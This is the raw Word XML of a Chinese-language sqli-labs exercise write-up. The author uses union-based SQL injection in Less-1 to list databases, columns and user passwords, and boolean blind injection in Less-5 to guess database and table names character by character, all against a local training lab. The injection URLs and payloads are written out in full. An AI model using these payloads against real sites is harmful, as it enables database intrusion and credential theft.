    <w:p w14:paraId="49980029" w14:textId="7C7FE059" w:rsidR="008863C7" w:rsidRDefault="008863C7" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>试试加上or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B37DBA" w14:textId="69F423D9" w:rsidR="008863C7" w:rsidRDefault="008863C7" w:rsidP="00C45C0D">
      <w:r w:rsidRPr="008863C7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56103A29" wp14:editId="0E79DB93">
            <wp:extent cx="5274310" cy="1985645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2053221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211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3700" w14:textId="11FC7DDA" w:rsidR="008863C7" w:rsidRDefault="008863C7" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回正常数据了，sql的构造语句为select</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ****** where id = ‘input_id’ L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>imit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，1之类的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F54A72B" w14:textId="526E2082" w:rsidR="008863C7" w:rsidRDefault="008863C7" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用order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看看有几列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C043680" w14:textId="119C6BBB" w:rsidR="008863C7" w:rsidRDefault="008863C7" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38DD8CCC" wp14:editId="69E61D5E">
            <wp:extent cx="5274310" cy="1664335"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="625986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86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C6B5" w14:textId="74913EC2" w:rsidR="008863C7" w:rsidRDefault="003B2A46" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03217E3C" wp14:editId="45C15EF0">
            <wp:extent cx="5274310" cy="1376680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="294205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059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00E6" w14:textId="404CA077" w:rsidR="003B2A46" w:rsidRDefault="003B2A46" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才4列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E98D851" w14:textId="0C805285" w:rsidR="003B2A46" w:rsidRDefault="003B2A46" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无过滤带回显</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098978AC" w14:textId="64BF4AD6" w:rsidR="003B2A46" w:rsidRDefault="003B2A46" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>-+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与Limit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，1合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD4BEC" w14:textId="31B1F59C" w:rsidR="003B2A46" w:rsidRDefault="003B2A46" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为永真值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6481FF50" w14:textId="469DA390" w:rsidR="008863C7" w:rsidRDefault="003B2A46" w:rsidP="00C45C0D">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ql语句为sql</w:t>
      </w:r>
      <w:r>
        <w:t>=”select * from users where id=’input_id’ or 1=1--+ ”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B976616" w14:textId="756FF098" w:rsidR="005417B6" w:rsidRDefault="004311E9" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆数据库：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301B7796" w14:textId="74553C2D" w:rsidR="004311E9" w:rsidRDefault="00000000" w:rsidP="00C45C0D">
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="004311E9" w:rsidRPr="00783DE8">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata--</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004311E9" w:rsidRPr="004311E9">
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDBB9F3" w14:textId="500C0765" w:rsidR="004311E9" w:rsidRDefault="004311E9" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78848D99" wp14:editId="3C0AF3C7">
            <wp:extent cx="5274310" cy="859790"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="66583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0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C923" w14:textId="1073455F" w:rsidR="00CC388E" w:rsidRDefault="00CC388E" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆破security数据库：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C34F64" w14:textId="50FDDC82" w:rsidR="00CC388E" w:rsidRDefault="00CC388E" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="360146FC" wp14:editId="104A60E1">
            <wp:extent cx="5274310" cy="3227705"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="171489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981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0CB3" w14:textId="22E6A9AC" w:rsidR="004311E9" w:rsidRDefault="004311E9" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆破</w:t>
      </w:r>
      <w:r w:rsidR="004D6D7A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidR="00CC388E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EA4012" w14:textId="69AE4A4B" w:rsidR="004311E9" w:rsidRDefault="00000000" w:rsidP="00C45C0D">
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="004311E9" w:rsidRPr="00783DE8">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27--</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004311E9" w:rsidRPr="004311E9">
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7C6C86" w14:textId="708C1001" w:rsidR="004311E9" w:rsidRDefault="004311E9" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="484EE9FA" wp14:editId="614289CD">
            <wp:extent cx="5274310" cy="707390"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="166637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754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2F0" w14:textId="39D8C5EE" w:rsidR="004D6D7A" w:rsidRDefault="004D6D7A" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E797432" w14:textId="6C869D5D" w:rsidR="008D2936" w:rsidRDefault="008D2936" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆字段内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCE0DBA" w14:textId="764CB6D3" w:rsidR="008D2936" w:rsidRDefault="00000000" w:rsidP="00C45C0D">
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="008D2936" w:rsidRPr="00783DE8">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27union%20select%201,username,password%20from%20users%20where%20id=2--</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008D2936" w:rsidRPr="008D2936">
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BBB3D5" w14:textId="08125A21" w:rsidR="008D2936" w:rsidRDefault="00B37D02" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43184ABA" wp14:editId="2A25A9C4">
            <wp:extent cx="5274310" cy="1819910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1656908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083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E5F2" w14:textId="1204AD6D" w:rsidR="00B37D02" w:rsidRDefault="00B37D02" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="587DEB70" wp14:editId="6B64AC78">
            <wp:extent cx="5274310" cy="1414780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2133437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376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B2D" w14:textId="50ECC929" w:rsidR="00B37D02" w:rsidRDefault="00B37D02" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26EE03E3" wp14:editId="7A3C4ABC">
            <wp:extent cx="5274310" cy="1887220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="849746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466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F3F9" w14:textId="081E8C3E" w:rsidR="00B37D02" w:rsidRDefault="00B37D02" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16F6DEB9" wp14:editId="73C8E2D6">
            <wp:extent cx="5274310" cy="1772920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1683726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263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C76B" w14:textId="6CA37B7A" w:rsidR="00B37D02" w:rsidRDefault="00B37D02" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBAB40C" w14:textId="77777777" w:rsidR="00B37D02" w:rsidRPr="008D2936" w:rsidRDefault="00B37D02" w:rsidP="00C45C0D"/>
    <w:p w14:paraId="334C31BE" w14:textId="77777777" w:rsidR="008D2936" w:rsidRDefault="008D2936" w:rsidP="008D2936">
      <w:r>
        <w:t>b.在关卡Less-5中使用报错注入、布尔盲注两种方法获取数据库库名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4433CDCE" w14:textId="0132FEC7" w:rsidR="008D2936" w:rsidRDefault="00DA108A" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看看版本号：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE4AD84" w14:textId="48BB32DE" w:rsidR="00DA108A" w:rsidRDefault="00DA108A" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="509B4437" wp14:editId="5780B7AC">
            <wp:extent cx="5274310" cy="3164840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="586289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89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B7AD" w14:textId="6A67151B" w:rsidR="00DA108A" w:rsidRDefault="00DA108A" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FA1A4D9" wp14:editId="5FB5671E">
            <wp:extent cx="5274310" cy="4064635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="967892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927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DC3C" w14:textId="5447C967" w:rsidR="00DA108A" w:rsidRDefault="00DA108A" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库版本号5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C846E29" w14:textId="37513A6C" w:rsidR="00DA108A" w:rsidRDefault="00167EE8" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜一猜数据库长度：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E685225" w14:textId="2D7A0781" w:rsidR="00167EE8" w:rsidRDefault="00167EE8" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D7EA805" wp14:editId="3196E9F5">
            <wp:extent cx="5274310" cy="4482465"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1141297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973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5307" w14:textId="6DDC99E4" w:rsidR="00167EE8" w:rsidRDefault="00167EE8" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回了正确的表现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4088326B" w14:textId="03CB7277" w:rsidR="00167EE8" w:rsidRDefault="00167EE8" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EF2EF90" wp14:editId="3831CE73">
            <wp:extent cx="5274310" cy="3583940"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="190882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235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851" w14:textId="4F7D9EDF" w:rsidR="002C6A50" w:rsidRDefault="002C6A50" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜测数据库第一位：</w:t>
      </w:r>
      <w:r w:rsidR="00D16BDE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二分法试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F259C2" w14:textId="77777777" w:rsidR="002C6A50" w:rsidRDefault="002C6A50" w:rsidP="002C6A50">
      <w:r>
        <w:t>http://127.0.0.1/sqli-labs-master/Less-5/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4527510F" w14:textId="50A84DA0" w:rsidR="002C6A50" w:rsidRDefault="002C6A50" w:rsidP="002C6A50">
      <w:r>
        <w:t>?id=1'and left(database(),1)&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>'--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0BC934" w14:textId="695C6A9C" w:rsidR="002C6A50" w:rsidRDefault="002C6A50" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E63E89F" wp14:editId="03F5020D">
            <wp:extent cx="5274310" cy="3879850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="953672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72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E6A7" w14:textId="77777777" w:rsidR="002C6A50" w:rsidRDefault="002C6A50" w:rsidP="002C6A50">
      <w:r>
        <w:t>http://127.0.0.1/sqli-labs-master/Less-5/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740B4AC3" w14:textId="672EFD2C" w:rsidR="002C6A50" w:rsidRDefault="002C6A50" w:rsidP="002C6A50">
      <w:r>
        <w:t>?id=1'and left(database(),1)&gt;'s'--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C532B1" w14:textId="34E36B08" w:rsidR="002C6A50" w:rsidRDefault="002C6A50" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="138DF33E" wp14:editId="34D948C1">
            <wp:extent cx="5274310" cy="3444875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="1485883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836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E8E1" w14:textId="44515C65" w:rsidR="00D16BDE" w:rsidRDefault="00D16BDE" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一个为‘S‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F16D0D" w14:textId="0BFA69E6" w:rsidR="00D16BDE" w:rsidRDefault="00D16BDE" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜测“</w:t>
      </w:r>
      <w:r>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BD9BF1" w14:textId="5A88FFE0" w:rsidR="00D16BDE" w:rsidRDefault="00D16BDE" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜第二位：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4A6E7C" w14:textId="680C493A" w:rsidR="00D16BDE" w:rsidRDefault="00D16BDE" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A622D0F" wp14:editId="0816C3C9">
            <wp:extent cx="5274310" cy="4180205"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="940948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80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C47F" w14:textId="3694608B" w:rsidR="00D16BDE" w:rsidRDefault="00D16BDE" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75489766" wp14:editId="4D9D128A">
            <wp:extent cx="5274310" cy="4491990"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="1865721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15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B4BF" w14:textId="3486F91C" w:rsidR="00D16BDE" w:rsidRDefault="00D16BDE" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确实是第二位</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D3DEAB" w14:textId="39FD9F75" w:rsidR="00D16BDE" w:rsidRDefault="00D16BDE" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接看看是不是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D124B36" w14:textId="701C14C3" w:rsidR="00D16BDE" w:rsidRDefault="00D16BDE" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="005566CB" wp14:editId="17A76769">
            <wp:extent cx="5274310" cy="4436745"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="170456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650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2EA8" w14:textId="79CE58BC" w:rsidR="00257B79" w:rsidRDefault="00835E89" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取security库的第一个表的第一个字符：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33359A82" w14:textId="62D12DDB" w:rsidR="00835E89" w:rsidRDefault="00835E89" w:rsidP="00C45C0D">
      <w:r w:rsidRPr="00835E89">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DD90886" wp14:editId="72D2A95B">
            <wp:extent cx="5274310" cy="2792095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="136850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067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5E9A" w14:textId="48CB9170" w:rsidR="00835E89" w:rsidRDefault="00835E89" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="449745F0" wp14:editId="10334F15">
            <wp:extent cx="5274310" cy="2978150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1066704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044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FBCF" w14:textId="634D740A" w:rsidR="00835E89" w:rsidRDefault="00835E89" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二分法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CDFC4C" w14:textId="161A1A74" w:rsidR="00835E89" w:rsidRDefault="00835E89" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，第一个为e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F4B4AA" w14:textId="420EC0F0" w:rsidR="00835E89" w:rsidRDefault="008A22C8" w:rsidP="00C45C0D">
      <w:r w:rsidRPr="008A22C8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B0C8CE8" wp14:editId="6648738D">
            <wp:extent cx="5274310" cy="2836545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="88366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65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2515" w14:textId="485E9BBD" w:rsidR="008A22C8" w:rsidRDefault="008A22C8" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="708976B3" wp14:editId="7A1B62AF">
            <wp:extent cx="5274310" cy="2979420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="179394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40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43B5" w14:textId="40565F74" w:rsidR="008A22C8" w:rsidRDefault="008A22C8" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个为m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1BE0D1" w14:textId="1948F1F1" w:rsidR="002C6A50" w:rsidRDefault="00D31DAB" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>忘了获取</w:t>
      </w:r>
      <w:r w:rsidR="00BB263D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>长度了：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED41664" w14:textId="77777777" w:rsidR="00D31DAB" w:rsidRDefault="00D31DAB" w:rsidP="00D31DAB">
      <w:r>
        <w:t>http://127.0.0.1/sqli-labs-master/Less-5/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BC606D" w14:textId="096BE1E2" w:rsidR="00D31DAB" w:rsidRDefault="00D31DAB" w:rsidP="00D31DAB">
      <w:r>
        <w:t>?id=1'and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)) = 6--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8C93A0" w14:textId="77777777" w:rsidR="00D31DAB" w:rsidRDefault="00D31DAB" w:rsidP="00D31DAB"/>
    <w:p w14:paraId="32C1F110" w14:textId="107475A3" w:rsidR="00D31DAB" w:rsidRDefault="00D31DAB" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ED19A7F" wp14:editId="0853971B">
            <wp:extent cx="5274310" cy="5216525"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="1984379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799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C755" w14:textId="03692EBA" w:rsidR="00D31DAB" w:rsidRDefault="00D31DAB" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段长度为6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239F54C0" w14:textId="6C08BE7E" w:rsidR="00D31DAB" w:rsidRDefault="00D31DAB" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>又是em开头的，很有可能是emaill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3748167C" w14:textId="41D8AB45" w:rsidR="00D31DAB" w:rsidRDefault="00D31DAB" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="302F3DB3" wp14:editId="54206013">
            <wp:extent cx="5274310" cy="3239135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="883004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04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02D9" w14:textId="7E7C9507" w:rsidR="00D31DAB" w:rsidRDefault="00D31DAB" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三个确定是a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79177321" w14:textId="378C52B7" w:rsidR="00D31DAB" w:rsidRDefault="00D31DAB" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确定security库第一个</w:t>
      </w:r>
      <w:r w:rsidR="00BB263D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表名为emaill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F693150" w14:textId="37190756" w:rsidR="00BB263D" w:rsidRDefault="00BB263D" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个表名：二分法尝试：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388BBEDB" w14:textId="72E6F4F3" w:rsidR="00BB263D" w:rsidRDefault="00BB263D" w:rsidP="00C45C0D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="214FFBF9" wp14:editId="564A2DC8">
            <wp:extent cx="5274310" cy="3576320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
